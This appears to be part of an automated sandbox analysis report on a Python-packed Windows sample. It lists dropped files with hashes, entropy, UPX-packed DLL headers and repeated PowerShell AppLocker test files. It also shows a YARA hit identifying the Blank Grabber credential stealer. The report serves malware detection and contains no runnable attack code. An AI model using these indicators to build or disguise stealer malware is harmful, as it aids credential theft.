                                                          SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, Author: Joe Security
                                                          Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                          C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):26384
                                                          Entropy (8bit):7.438368098774459
                                                          Encrypted:false
                                                          SSDEEP:768:UjW1JOQuL3pJbNIPQGCF5YiSyvnnPxWEuN:UjW1AnbNIPQGCL7SyvnPxa
                                                          MD5:90FEA71C9828751E36C00168B9BA4B2B
                                                          SHA1:15B506DF7D02612E3BA49F816757AD0C141E9DC1
                                                          SHA-256:5BBBB4F0B4F9E5329BA1D518D6E8144B1F7D83E2D7EAF6C50EEF6A304D78F37D
                                                          SHA-512:E424BE422BF0EF06E7F9FF21E844A84212BFA08D7F9FBD4490CBBCB6493CC38CC1223AAF8B7C9CD637323B81EE93600D107CC1C982A2288EB2A0F80E2AD1F3C5
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                          C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):637720
                                                          Entropy (8bit):7.994077868940962
                                                          Encrypted:true
                                                          SSDEEP:12288:2VROCPPIR0z79c8aCucuAVbXiFHTiDheVoxz0u4d0M2A9UCC:2VERAc83uc1XiJly01hUCC
                                                          MD5:395332E795CB6ABACA7D0126D6C1F215
                                                          SHA1:B845BD8864CD35DCB61F6DB3710ACC2659ED9F18
                                                          SHA-256:8E8870DAC8C96217FEFF4FA8AF7C687470FBCCD093D97121BC1EAC533F47316C
                                                          SHA-512:8BC8C8C5F10127289DEDB012B636BC3959ACB5C15638E7ED92DACDC8D8DBA87A8D994AAFFC88BC7DC89CCFEEF359E3E79980DFA293A9ACAE0DC00181096A0D66
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3...R...R...R...*&..R..@....R..@....R..@....R..@....R..D*...R...R...R.......R.......R....J..R.......R..Rich.R..........................PE..d......d.........." ...".`...0......p,.......................................p............`..........................................K..."...H.......@.......................m.......................................8..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                          C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):302872
                                                          Entropy (8bit):7.986772329138341
                                                          Encrypted:false
                                                          SSDEEP:6144:ik/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9Kik+V65:ikUfQJbUV2MhCwEQc5Np9zk+U5
                                                          MD5:C2556DC74AEA61B0BD9BD15E9CD7B0D6
                                                          SHA1:05EFF76E393BFB77958614FF08229B6B770A1750
                                                          SHA-256:987A6D21CE961AFEAAA40BA69859D4DD80D20B77C4CA6D2B928305A873D6796D
                                                          SHA-512:F29841F262934C810DD1062151AEFAC78CD6A42D959A8B9AC832455C646645C07FD9220866B262DE1BC501E1A9570591C0050D5D3607F1683437DEA1FF04C32B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0c1jk2uv.15r.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3irfobuz.2z0.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kclmv5r.1by.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afeqbbkm.cmn.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai0r4lsm.erx.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aohakydu.c0t.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br0j3qie.bnt.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccwtjpkd.n2j.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddz0ocwq.hav.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1syxpme.uzd.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgrmdg4r.nyz.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glevqxfx.xct.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwvi5lhg.z4o.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1efh13z.cjv.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcdjrlk2.451.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1qj5kqe.1zn.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrornz3p.rcc.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtzrjp1b.50z.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rf04ztue.v4f.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm2g44o5.tm3.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uswaxbu5.g2u.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqgwfbgp.bar.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm5ml0fq.wp2.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zazph0yb.xza.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1140582735284434
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynAak7Ynqq8lPN5Dlq5J:+RI+ycuZhNdAakS8lPNnqX
                                                          MD5:FB2FC8E18272AD52F18208F56C5E1FC6
                                                          SHA1:63AB994B9DE7EC22ACE1486A8AC75184CDE33A2B
                                                          SHA-256:39A6B79462E7EA57FE551E2CD59C36C2EFFE8ACC6D67D6924A757D133D73A6AF
                                                          SHA-512:5CBA3A2B79E80FC5DBF7663D5EB88DB12DBDDC67AC3AD5F21FDCC6E89FF323B25E315A5F3D4650C4A804213C4204F91FF4A6BBD15EEC863B711ABB704E83259B
                                                          Malicious:false
